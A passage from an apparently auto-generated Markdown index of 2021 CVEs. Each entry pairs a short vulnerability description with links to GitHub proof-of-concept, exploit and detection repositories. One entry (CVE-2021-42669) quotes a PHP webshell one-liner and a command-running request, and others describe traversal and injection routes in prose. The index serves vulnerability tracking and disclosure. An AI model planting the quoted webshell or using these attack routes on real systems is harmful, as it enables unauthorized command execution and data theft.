- [TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated)

### CVE-2021-42237 (2021-11-05)

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

- [ItsIgnacioPortal/CVE-2021-42237](https://github.com/ItsIgnacioPortal/CVE-2021-42237)
- [vesperp/CVE-2021-42237-SiteCore-XP](https://github.com/vesperp/CVE-2021-42237-SiteCore-XP)
- [crankyyash/SiteCore-RCE-Detection](https://github.com/crankyyash/SiteCore-RCE-Detection)

### CVE-2021-42261 (2021-10-19)

Revisor Video Management System (VMS) before 2.0.0 has a directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server. This could lead to the disclosure of sensitive data on the vulnerable server.

- [jet-pentest/CVE-2021-42261](https://github.com/jet-pentest/CVE-2021-42261)

### CVE-2021-42278 (2021-11-10)

Active Directory Domain Services Elevation of Privilege Vulnerability

- [safebuffer/sam-the-admin](https://github.com/safebuffer/sam-the-admin)
- [Ridter/noPac](https://github.com/Ridter/noPac)
- [waterrr/noPac](https://github.com/waterrr/noPac)
- [ly4k/Pachine](https://github.com/ly4k/Pachine)
- [cybersecurityworks553/noPac-detection](https://github.com/cybersecurityworks553/noPac-detection)

### CVE-2021-42287 (2021-11-10)

Active Directory Domain Services Elevation of Privilege Vulnerability

- [cube0x0/noPac](https://github.com/cube0x0/noPac)
- [ricardojba/Invoke-noPac](https://github.com/ricardojba/Invoke-noPac)
- [knightswd/NoPacScan](https://github.com/knightswd/NoPacScan)
- [XiaoliChan/Invoke-sAMSpoofing](https://github.com/XiaoliChan/Invoke-sAMSpoofing)
- [TryA9ain/noPac](https://github.com/TryA9ain/noPac)

### CVE-2021-42292 (2021-11-10)

Microsoft Excel Security Feature Bypass Vulnerability

- [corelight/CVE-2021-42292](https://github.com/corelight/CVE-2021-42292)

### CVE-2021-42321 (2021-11-10)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [DarkSprings/CVE-2021-42321](https://github.com/DarkSprings/CVE-2021-42321)
- [xnyuq/cve-2021-42321](https://github.com/xnyuq/cve-2021-42321)
- [7BitsTeam/exch_CVE-2021-42321](https://github.com/7BitsTeam/exch_CVE-2021-42321)

### CVE-2021-42325 (2021-10-12)

Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name.

- [AK-blank/CVE-2021-42325-](https://github.com/AK-blank/CVE-2021-42325-)

### CVE-2021-42327 (2021-10-21)

dp_link_settings_write in drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c in the Linux kernel through 5.14.14 allows a heap-based buffer overflow by an attacker who can write a string to the AMD GPU display driver's debug filesystem. There are no checks on size within parse_write_buffer_into_params when it uses the size of copy_from_user to copy a userspace buffer into a 40-byte heap buffer.

- [docfate111/CVE-2021-42327](https://github.com/docfate111/CVE-2021-42327)

### CVE-2021-42342 (2021-10-14)

An issue was discovered in GoAhead 4.x and 5.x before 5.1.5. In the file upload filter, user form variables can be passed to CGI scripts without being prefixed with the CGI prefix. This permits tunneling untrusted environment variables into vulnerable CGI scripts.

- [kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-](https://github.com/kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-)
- [ijh4723/-zeroboo-Gohead-CVE-2021-42342-1](https://github.com/ijh4723/-zeroboo-Gohead-CVE-2021-42342-1)

### CVE-2021-42362 (2021-11-17)

The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.

- [simonecris/CVE-2021-42362-PoC](https://github.com/simonecris/CVE-2021-42362-PoC)

### CVE-2021-42392 (2022-01-07)

The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and the URL of the database. An attacker may pass a JNDI driver name and a URL leading to an LDAP or RMI server, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console, which leads to unauthenticated remote code execution.

- [cybersecurityworks553/CVE-2021-42392-Detect](https://github.com/cybersecurityworks553/CVE-2021-42392-Detect)

### CVE-2021-42558 (2022-01-12)

An issue was discovered in CALDERA 2.8.1. It contains multiple reflected, stored, and self XSS vulnerabilities that may be exploited by authenticated and unauthenticated attackers.

- [mbadanoiu/CVE-2021-42558](https://github.com/mbadanoiu/CVE-2021-42558)

### CVE-2021-42559 (2022-01-12)

An issue was discovered in CALDERA 2.8.1. It contains multiple startup "requirements" that execute commands when starting the server. Because these commands can be changed via the REST API, an authenticated user can insert arbitrary commands that will execute when the server is restarted.

- [mbadanoiu/CVE-2021-42559](https://github.com/mbadanoiu/CVE-2021-42559)

### CVE-2021-42560 (2022-01-12)

An issue was discovered in CALDERA 2.9.0. The Debrief plugin receives base64 encoded "SVG" parameters when generating a PDF document. These SVG documents are parsed in an unsafe manner and can be leveraged for XXE attacks (e.g., File Exfiltration, Server Side Request Forgery, Out of Band Exfiltration, etc.).

- [mbadanoiu/CVE-2021-42560](https://github.com/mbadanoiu/CVE-2021-42560)

### CVE-2021-42561 (2022-01-12)

An issue was discovered in CALDERA 2.8.1. When activated, the Human plugin passes the unsanitized name parameter to a python "os.system" function. This allows attackers to use shell metacharacters (e.g., backticks "``" or dollar parenthesis "$()" ) in order to escape the current command and execute arbitrary shell commands.

- [mbadanoiu/CVE-2021-42561](https://github.com/mbadanoiu/CVE-2021-42561)

### CVE-2021-42562 (2022-01-12)

An issue was discovered in CALDERA 2.8.1. It does not properly segregate user privileges, resulting in non-admin users having access to read and modify configuration or other components that should only be accessible by admin users.

- [mbadanoiu/CVE-2021-42562](https://github.com/mbadanoiu/CVE-2021-42562)

### CVE-2021-42574 (2021-11-01)

An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-right and right-to-left characters, the visual order of tokens may be different from their logical order. Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.

- [shiomiyan/CVE-2021-42574](https://github.com/shiomiyan/CVE-2021-42574)
- [hffaust/CVE-2021-42574_and_CVE-2021-42694](https://github.com/hffaust/CVE-2021-42574_and_CVE-2021-42694)
- [simplylu/CVE-2021-42574](https://github.com/simplylu/CVE-2021-42574)
- [maweil/bidi_char_detector](https://github.com/maweil/bidi_char_detector)
- [pierDipi/unicode-control-characters-action](https://github.com/pierDipi/unicode-control-characters-action)
- [waseeld/CVE-2021-42574](https://github.com/waseeld/CVE-2021-42574)
- [tin-z/solidity_CVE-2021-42574-POC](https://github.com/tin-z/solidity_CVE-2021-42574-POC)

### CVE-2021-42662 (2021-11-05)

A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the Holiday reason parameter. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfer's behalf, which can lead to cookie stealing and more.

- [0xDeku/CVE-2021-42662](https://github.com/0xDeku/CVE-2021-42662)

### CVE-2021-42663 (2021-11-05)

An HTML injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the HTML content of the attacker's choice is displayed.

- [0xDeku/CVE-2021-42663](https://github.com/0xDeku/CVE-2021-42663)

### CVE-2021-42664 (2021-11-05)

A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the (1) Quiz title and (2) quiz description parameters to add_quiz.php. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfer's behalf, which can lead to cookie stealing and more.

- [0xDeku/CVE-2021-42664](https://github.com/0xDeku/CVE-2021-42664)

### CVE-2021-42665 (2021-11-05)

An SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the login form inside of index.php, which can allow an attacker to bypass authentication.

- [0xDeku/CVE-2021-42665](https://github.com/0xDeku/CVE-2021-42665)

### CVE-2021-42666 (2021-11-05)

A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to quiz_question.php, which could let a malicious user extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server.

- [0xDeku/CVE-2021-42666](https://github.com/0xDeku/CVE-2021-42666)

### CVE-2021-42667 (2021-11-05)

A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the SQL query performed. As a result, they can extract sensitive data from the web server and in some cases use this vulnerability in order to get remote code execution on the remote web server.

- [0xDeku/CVE-2021-42667](https://github.com/0xDeku/CVE-2021-42667)

### CVE-2021-42668 (2021-11-05)

A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page. As a result, an attacker can extract sensitive data from the web server and in some cases can use this vulnerability in order to get remote code execution on the remote web server.

- [0xDeku/CVE-2021-42668](https://github.com/0xDeku/CVE-2021-42668)

### CVE-2021-42669 (2021-11-05)

A file upload vulnerability exists in Sourcecodester Engineers Online Portal in PHP via dashboard_teacher.php, which allows changing the avatar through teacher_avatar.php. Once an avatar is uploaded it is stored in the /admin/uploads/ directory, and is accessible by all users. By uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" the attacker can execute commands on the web server with - /admin/uploads/php-webshell?cmd=id.

- [0xDeku/CVE-2021-42669](https://github.com/0xDeku/CVE-2021-42669)

### CVE-2021-42670 (2021-11-05)

A SQL injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to the announcements_student.php web page. As a result a malicious user can extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server.

- [0xDeku/CVE-2021-42670](https://github.com/0xDeku/CVE-2021-42670)

### CVE-2021-42671 (2021-11-05)

An incorrect access control vulnerability exists in Sourcecodester Engineers Online Portal in PHP in nia_munoz_monitoring_system/admin/uploads. An attacker can leverage this vulnerability in order to bypass access controls and access all the files uploaded to the web server without the need of authentication or authorization.

- [0xDeku/CVE-2021-42671](https://github.com/0xDeku/CVE-2021-42671)

### CVE-2021-42694 (2021-11-01)

An issue was discovered in the character definitions of the Unicode Specification through 14.0. The specification allows an adversary to produce source code identifiers such as function names using homoglyphs that render visually identical to a target identifier. Adversaries can leverage this to inject code via adversarial identifier definitions in upstream software dependencies invoked deceptively in downstream software. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard (all versions). Unless mitigated, an adversary could produce source code identifiers using homoglyph characters that render visually identical to but are distinct from a target identifier. In this way, an adversary could inject adversarial identifier definitions in upstream software that are not detected by human reviewers and are invoked deceptively in downstream software. The Unicode Consortium has documented this class of security vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms.

- [simplylu/CVE-2021-42694](https://github.com/simplylu/CVE-2021-42694)

### CVE-2021-42697 (2021-11-02)

Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7 can encounter stack exhaustion while parsing HTTP headers, which allows a remote attacker to conduct a Denial of Service attack by sending a User-Agent header with deeply nested comments.

- [cxosmo/CVE-2021-42697](https://github.com/cxosmo/CVE-2021-42697)

### CVE-2021-42717 (2021-12-07)

ModSecurity 3.x through 3.0.5 mishandles excessively nested JSON objects. Crafted JSON objects with nesting tens-of-thousands deep could result in the web server being unable to service legitimate requests. Even a moderately large (e.g., 300KB) HTTP request can occupy one of the limited NGINX worker processes for minutes and consume almost all of the available CPU on the machine. Modsecurity 2 is similarly vulnerable: the affected versions include 2.8.0 through 2.9.4.

- [EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717](https://github.com/EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717)

### CVE-2021-42756 (2023-02-16)

Multiple stack-based buffer overflow vulnerabilities [CWE-121] in the proxy daemon of FortiWeb 5.x all versions, 6.0.7 and below, 6.1.2 and below, 6.2.6 and below, 6.3.16 and below, 6.4 all versions may allow an unauthenticated remote attacker to achieve arbitrary code execution via specifically crafted HTTP requests.

- [3ndorph1n/CVE-2021-42756](https://github.com/3ndorph1n/CVE-2021-42756)

### CVE-2021-42835 (2021-12-08)

An issue was discovered in Plex Media Server through 1.24.4.5081-e362dc1ee. An attacker (with a foothold on an endpoint via a low-privileged user account) can access the exposed RPC service of the update service component. This RPC functionality allows the attacker to interact with the RPC functionality and execute code from a path of their choice (local, or remote via SMB) because of a TOCTOU race condition. This code execution is in the context of the Plex update service (which runs as SYSTEM).

- [netanelc305/PlEXcalaison](https://github.com/netanelc305/PlEXcalaison)

### CVE-2021-42913 (2021-12-20)

The SyncThru Web Service on Samsung SCX-6x55X printers allows an attacker to gain access to a list of SMB users and cleartext passwords by reading the HTML source code. Authentication is not required.

- [kernel-cyber/CVE-2021-42913](https://github.com/kernel-cyber/CVE-2021-42913)

### CVE-2021-42948 (2022-09-16)

HotelDruid Hotel Management Software v3.0.3 and below was discovered to have exposed session tokens in multiple links via GET parameters, allowing attackers to access user session IDs.

- [dhammon/HotelDruid-CVE-2021-42948](https://github.com/dhammon/HotelDruid-CVE-2021-42948)

### CVE-2021-42949 (2022-09-16)

The component controlla_login function in HotelDruid Hotel Management Software v3.0.3 generates a predictable session token, allowing attackers to bypass authentication via brute-force attacks.

- [dhammon/HotelDruid-CVE-2021-42949](https://github.com/dhammon/HotelDruid-CVE-2021-42949)

### CVE-2021-43008 (2022-04-05)

Improper Access Control in Adminer versions 1.12.0 to 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the remote server by requesting the Adminer to connect to a remote MySQL database.

- [p0dalirius/CVE-2021-43008-AdminerRead](https://github.com/p0dalirius/CVE-2021-43008-AdminerRead)

### CVE-2021-43032 (2021-11-03)

In XenForo through 2.2.7, a threat actor with access to the admin panel can create a new Advertisement via the Advertising function, and save an XSS payload in the body of the HTML document. This payload will execute globally on the client side.

- [SakuraSamuraii/CVE-2021-43032](https://github.com/SakuraSamuraii/CVE-2021-43032)

### CVE-2021-43129 (2022-04-19)

A bypass exists for Desire2Learn/D2L Brightspace’s “Disable Right Click” option in the quizzing feature, which allows a quiz-taker to access print and copy functionality via the browser’s right click menu even when “Disable Right Click” is enabled on the quiz.

- [Skotizo/CVE-2021-43129](https://github.com/Skotizo/CVE-2021-43129)

### CVE-2021-43141 (2021-11-03)

Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in plan_application.

- [Jeromeyoung/CVE-2021-43141](https://github.com/Jeromeyoung/CVE-2021-43141)

### CVE-2021-43217 (2021-12-15)

Windows Encrypting File System (EFS) Remote Code Execution Vulnerability

- [JolynNgSC/EFS_CVE-2021-43217](https://github.com/JolynNgSC/EFS_CVE-2021-43217)

### CVE-2021-43224 (2021-12-15)

Windows Common Log File System Driver Information Disclosure Vulnerability

- [KaLendsi/CVE-2021-43224-POC](https://github.com/KaLendsi/CVE-2021-43224-POC)

### CVE-2021-43226 (2021-12-15)

Windows Common Log File System Driver Elevation of Privilege Vulnerability

- [Rosayxy/cve-2021-43226PoC](https://github.com/Rosayxy/cve-2021-43226PoC)

### CVE-2021-43229 (2021-12-15)

Windows NTFS Elevation of Privilege Vulnerability

- [Citizen13X/CVE-2021-43229](https://github.com/Citizen13X/CVE-2021-43229)

### CVE-2021-43258 (2022-11-23)

CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access to the ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the site in the /tmp_attach/ folder where it can be accessed with a GET request. There are no limitations on files that can be attached, allowing for malicious PHP code to be uploaded and interpreted by the server.

- [MRvirusIR/CVE-2021-43258](https://github.com/MRvirusIR/CVE-2021-43258)

### CVE-2021-43267 (2021-11-02)

An issue was discovered in net/tipc/crypto.c in the Linux kernel before 5.14.16. The Transparent Inter-Process Communication (TIPC) functionality allows remote attackers to exploit insufficient validation of user-supplied sizes for the MSG_CRYPTO message type.

- [DarkSprings/CVE-2021-43267-POC](https://github.com/DarkSprings/CVE-2021-43267-POC)
- [zzhacked/CVE-2021-43267](https://github.com/zzhacked/CVE-2021-43267)

### CVE-2021-43287 (2022-04-14)

An issue was discovered in ThoughtWorks GoCD before 21.3.0. The business continuity add-on, which is enabled by default, leaks all secrets known to the GoCD server to unauthenticated attackers.

- [Wrin9/CVE-2021-43287](https://github.com/Wrin9/CVE-2021-43287)

### CVE-2021-43297 (2022-01-10)

A deserialization vulnerability existed in dubbo hessian-lite 3.2.11 and its earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protocol; when Hessian catches unexpected exceptions, it logs some information for users, which may cause remote command execution. This issue affects Apache Dubbo 2.6.x versions prior to 2.6.12; Apache Dubbo 2.7.x versions prior to 2.7.15; Apache Dubbo 3.0.x versions prior to 3.0.5.

- [bitterzzZZ/CVE-2021-43297-POC](https://github.com/bitterzzZZ/CVE-2021-43297-POC)
- [longofo/Apache-Dubbo-Hessian2-CVE-2021-43297](https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297)

### CVE-2021-43326 (2021-12-15)

Automox Agent before 32 on Windows incorrectly sets permissions on a temporary directory.

- [gfoss/CVE-2021-43326_Exploit](https://github.com/gfoss/CVE-2021-43326_Exploit)

### CVE-2021-43408 (2021-11-19)

The "Duplicate Post" WordPress plugin up to and including version 1.1.9 is vulnerable to SQL Injection. SQL injection vulnerabilities occur when client supplied data is included within an SQL Query insecurely. SQL Injection can typically be exploited to read, modify and delete SQL table data. In many cases it is also possible to exploit features of the SQL server to execute system commands and/or access the local file system. This particular vulnerability can be exploited by any authenticated user who has been granted access to use the Duplicate Post plugin. By default, this is limited to Administrators, however the plugin presents the option to permit access to the Editor, Author, Contributor and Subscriber roles.

- [tuannq2299/CVE-2021-43408](https://github.com/tuannq2299/CVE-2021-43408)

### CVE-2021-43469 (2021-12-06)

VINGA WR-N300U 77.102.1.4853 is affected by a command execution vulnerability in the goahead component.

- [badboycxcc/CVE-2021-43469](https://github.com/badboycxcc/CVE-2021-43469)

### CVE-2021-43471 (2021-12-06)

In Canon LBP223 printers, the System Manager Mode login does not require an account password or PIN. An attacker can remotely shut down the device after entering the background, creating a denial of service vulnerability.

- [cxaqhq/CVE-2021-43471](https://github.com/cxaqhq/CVE-2021-43471)

### CVE-2021-43503
- [guoyanan1g/Laravel-vul](https://github.com/guoyanan1g/Laravel-vul)
- [kang8/CVE-2021-43503](https://github.com/kang8/CVE-2021-43503)

### CVE-2021-43515 (2022-04-08)

CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file.

- [ixSly/CVE-2021-43515](https://github.com/ixSly/CVE-2021-43515)

### CVE-2021-43530 (2021-12-08)

A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. *This bug only affects Firefox for Android. Other operating systems are unaffected.* This vulnerability affects Firefox < 94.

- [hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-](https://github.com/hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-)

### CVE-2021-43557 (2021-11-22)

The uri-block plugin in Apache APISIX before 2.10.2 uses $request_uri without verification. The $request_uri is the full original request URI without normalization. This makes it possible to construct a URI to bypass the block list on some occasions. For instance, when the block list contains "^/internal/", a URI like `//internal/` can be used to bypass it. Some other plugins also have the same issue. And it may affect the developer's custom plugin.

- [xvnpw/k8s-CVE-2021-43557-poc](https://github.com/xvnpw/k8s-CVE-2021-43557-poc)

### CVE-2021-43609 (2023-11-08)

An issue was discovered in Spiceworks Help Desk Server before 1.3.3. A Blind Boolean SQL injection vulnerability within the order_by_for_ticket function in app/models/reporting/database_query.rb allows an authenticated attacker to execute arbitrary SQL commands via the sort parameter. This can be leveraged to leak local files from the host system, leading to remote code execution (RCE) through deserialization of malicious data.

- [d5sec/CVE-2021-43609-POC](https://github.com/d5sec/CVE-2021-43609-POC)

### CVE-2021-43616 (2021-11-13)

The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI.

- [icatalina/CVE-2021-43616](https://github.com/icatalina/CVE-2021-43616)

### CVE-2021-43617 (2021-11-14)

Laravel Framework through 8.70.2 does not sufficiently block the upload of executable PHP content because Illuminate/Validation/Concerns/ValidatesAttributes.php lacks a check for .phar files, which are handled as application/x-httpd-php on systems based on Debian. NOTE: this CVE Record is for Laravel Framework, and is unrelated to any reports concerning incorrectly written user applications for image upload.

- [kombat1/CVE-2021-43617](https://github.com/kombat1/CVE-2021-43617)
- [aweiiy/CVE-2021-43617](https://github.com/aweiiy/CVE-2021-43617)
- [Sybelle03/CVE-2021-43617](https://github.com/Sybelle03/CVE-2021-43617)

### CVE-2021-43650 (2022-03-22)

WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process.

- [OpenXP-Research/CVE-2021-43650](https://github.com/OpenXP-Research/CVE-2021-43650)

### CVE-2021-43657 (2022-12-22)

A Stored Cross-site scripting (XSS) vulnerability via MAster.php in Sourcecodetester Simple Client Management System (SCMS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the vulnerable input fields.

- [c0n5n3d/CVE-2021-43657](https://github.com/c0n5n3d/CVE-2021-43657)

### CVE-2021-43778 (2021-11-24)

Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file.

- [AK-blank/CVE-2021-43778](https://github.com/AK-blank/CVE-2021-43778)

### CVE-2021-43789 (2021-12-07)

PrestaShop is an Open Source e-commerce web application. Versions of PrestaShop prior to 1.7.8.2 are vulnerable to blind SQL injection using search filters with `orderBy` and `sortOrder` parameters. The problem is fixed in version 1.7.8.2.

- [numanturle/CVE-2021-43789](https://github.com/numanturle/CVE-2021-43789)

### CVE-2021-43798 (2021-12-07)

Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.

- [taythebot/CVE-2021-43798](https://github.com/taythebot/CVE-2021-43798)
- [zer0yu/CVE-2021-43798](https://github.com/zer0yu/CVE-2021-43798)
- [jas502n/Grafana-CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798)
- [ScorpionsMAX/CVE-2021-43798-Grafana-POC](https://github.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC)
- [Mr-xn/CVE-2021-43798](https://github.com/Mr-xn/CVE-2021-43798)
- [asaotomo/CVE-2021-43798-Grafana-Exp](https://github.com/asaotomo/CVE-2021-43798-Grafana-Exp)
- [A-D-Team/grafanaExp](https://github.com/A-D-Team/grafanaExp)
- [kenuosec/grafanaExp](https://github.com/kenuosec/grafanaExp)
- [M0ge/CVE-2021-43798-grafana_fileread](https://github.com/M0ge/CVE-2021-43798-grafana_fileread)
- [JiuBanSec/Grafana-CVE-2021-43798](https://github.com/JiuBanSec/Grafana-CVE-2021-43798)
- [lfz97/CVE-2021-43798-Grafana-File-Read](https://github.com/lfz97/CVE-2021-43798-Grafana-File-Read)
- [s1gh/CVE-2021-43798](https://github.com/s1gh/CVE-2021-43798)
- [z3n70/CVE-2021-43798](https://github.com/z3n70/CVE-2021-43798)
- [Mo0ns/Grafana_POC-CVE-2021-43798](https://github.com/Mo0ns/Grafana_POC-CVE-2021-43798)
- [fanygit/Grafana-CVE-2021-43798Exp](https://github.com/fanygit/Grafana-CVE-2021-43798Exp)
- [LongWayHomie/CVE-2021-43798](https://github.com/LongWayHomie/CVE-2021-43798)
- [pedrohavay/exploit-grafana-CVE-2021-43798](https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798)
- [gixxyboy/CVE-2021-43798](https://github.com/gixxyboy/CVE-2021-43798)
- [Ryze-T/CVE-2021-43798](https://github.com/Ryze-T/CVE-2021-43798)
- [k3rwin/CVE-2021-43798-Grafana](https://github.com/k3rwin/CVE-2021-43798-Grafana)
- [gps1949/CVE-2021-43798](https://github.com/gps1949/CVE-2021-43798)
- [halencarjunior/grafana-CVE-2021-43798](https://github.com/halencarjunior/grafana-CVE-2021-43798)
- [light-Life/CVE-2021-43798](https://github.com/light-Life/CVE-2021-43798)
- [rodpwn/CVE-2021-43798-mass_scanner](https://github.com/rodpwn/CVE-2021-43798-mass_scanner)
- [aymenbouferroum/CVE-2021-43798_exploit](https://github.com/aymenbouferroum/CVE-2021-43798_exploit)
- [Jroo1053/GrafanaDirInclusion](https://github.com/Jroo1053/GrafanaDirInclusion)
- [yasindce1998/grafana-cve-2021-43798](https://github.com/yasindce1998/grafana-cve-2021-43798)
- [hupe1980/CVE-2021-43798](https://github.com/hupe1980/CVE-2021-43798)
- [G01d3nW01f/CVE-2021-43798](https://github.com/G01d3nW01f/CVE-2021-43798)
- [mauricelambert/LabAutomationCVE-2021-43798](https://github.com/mauricelambert/LabAutomationCVE-2021-43798)
- [FAOG99/GrafanaDirectoryScanner](https://github.com/FAOG99/GrafanaDirectoryScanner)
- [victorhorowitz/grafana-exploit-CVE-2021-43798](https://github.com/victorhorowitz/grafana-exploit-CVE-2021-43798)
- [katseyres2/CVE-2021-43798](https://github.com/katseyres2/CVE-2021-43798)
- [Iris288/CVE-2021-43798](https://github.com/Iris288/CVE-2021-43798)
- [wagneralves/CVE-2021-43798](https://github.com/wagneralves/CVE-2021-43798)
- [K3ysTr0K3R/CVE-2021-43798-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT)
- [ticofookfook/CVE-2021-43798](https://github.com/ticofookfook/CVE-2021-43798)
- [topyagyuu/CVE-2021-43798](https://github.com/topyagyuu/CVE-2021-43798)
- [MalekAlthubiany/CVE-2021-43798](https://github.com/MalekAlthubiany/CVE-2021-43798)
- [Sic4rio/Grafana-Decryptor-for-CVE-2021-43798](https://github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798)
- [sazzad1337/Grafana-CVE-2021-43798](https://github.com/sazzad1337/Grafana-CVE-2021-43798)

### CVE-2021-43799 (2022-01-25)

Zulip is an open-source team collaboration tool. Zulip Server installs RabbitMQ for internal message passing. In versions of Zulip Server prior to 4.9, the initial installation (until first reboot, or restart of RabbitMQ) does not successfully limit the default ports which RabbitMQ opens; this includes port 25672, the RabbitMQ distribution port, which is used as a management port. RabbitMQ's default "cookie" which protects this port is generated using a weak PRNG, which limits the entropy of the password to at most 36 bits; in practice, the seed for the randomizer is biased, resulting in approximately 20 bits of entropy. If other firewalls (at the OS or network level) do not protect port 25672, a remote attacker can brute-force the 20 bits of entropy in the "cookie" and leverage it for arbitrary execution of code as the rabbitmq user. They can also read all data which is sent through RabbitMQ, which includes all message traffic sent by users. Version 4.9 contains a patch for this vulnerability. As a workaround, ensure that firewalls prevent access to ports 5672 and 25672 from outside the Zulip server.

- [scopion/CVE-2021-43799](https://github.com/scopion/CVE-2021-43799)

### CVE-2021-43811 (2021-12-08)

Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24.

- [s-index/CVE-2021-43811](https://github.com/s-index/CVE-2021-43811)

### CVE-2021-43821 (2021-12-14)

